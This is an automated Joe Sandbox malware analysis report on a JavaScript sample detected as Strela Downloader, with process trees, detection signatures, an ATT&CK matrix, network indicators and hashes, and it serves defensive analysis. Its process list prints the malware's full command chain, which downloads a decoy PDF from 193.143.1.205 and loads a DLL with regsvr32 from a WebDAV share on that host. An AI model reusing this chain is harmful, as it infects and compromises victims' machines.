Windows
Analysis Report
199708044356824138.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 1448 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\19970 8044356824 138.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4940 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\858 4156612461 5.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6380 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 2256 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7244 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7452 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 36 --field -trial-han dle=1684,i ,347250926 7338224493 ,165576027 0613456483 3,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7308 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs | |||
5% | Virustotal | Browse |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587727 |
Start date and time: | 2025-01-10 17:25:27 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 199708044356824138.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 3.233.129.217, 52.6.155.20, 52.22.41.97, 3.219.243.226, 2.16.168.107, 2.16.168.105, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 2.22.242.123, 2.22.242.11, 23.204.152.210, 23.204.152.213, 192.168.2.4, 172.202.163.200, 104.78.188.188, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:26:21 | API Interceptor | |
11:26:25 | API Interceptor | |
11:26:25 | API Interceptor | |
11:26:38 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073604263766159 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre:KooCEYhgYEL0In |
MD5: | 8756D154C6862C6D9010010B1BA694BC |
SHA1: | 98AD36B212126CBC978A883E58F58D003EAD5522 |
SHA-256: | 7C34615C401B09D6887928F8424F9999E24A79D2E324C335801FC8DD1390CA86 |
SHA-512: | 353BE76AE2D9B1F5CC79C7C73B314F8C56DD8234ADB8799CB569323CB32A1F532513833ABDF9EDD4F53B812D6645A81E783097E1FA2CFBA247078825DF60347B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221251844980091 |
Encrypted: | false |
SSDEEP: | 1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO |
MD5: | AF59EB9E58F06F5F193C813002A084CC |
SHA1: | 9E2A463D6AD8F7095C88CF9814BA2886781B5106 |
SHA-256: | DE5BE4B76961BF9F3CA57856A879D7BFC541FFB9FD17F6A0A43EDB826B8F1CD9 |
SHA-512: | 9CFAA5720E7913DCEB0D9C190CA70A3966559BB61D931F88D39BB37FA7B97E63C6B6EF5527ED8AC3C6FA74EA8053D99C2E0DE2B773D91BCFC9BA00BE2ACE322C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07660160841460162 |
Encrypted: | false |
SSDEEP: | 3:u3W/EYeJ98rtCjn13a/e7DZollcVO/lnlZMxZNQl:uG8zJ98c53qe7+Oewk |
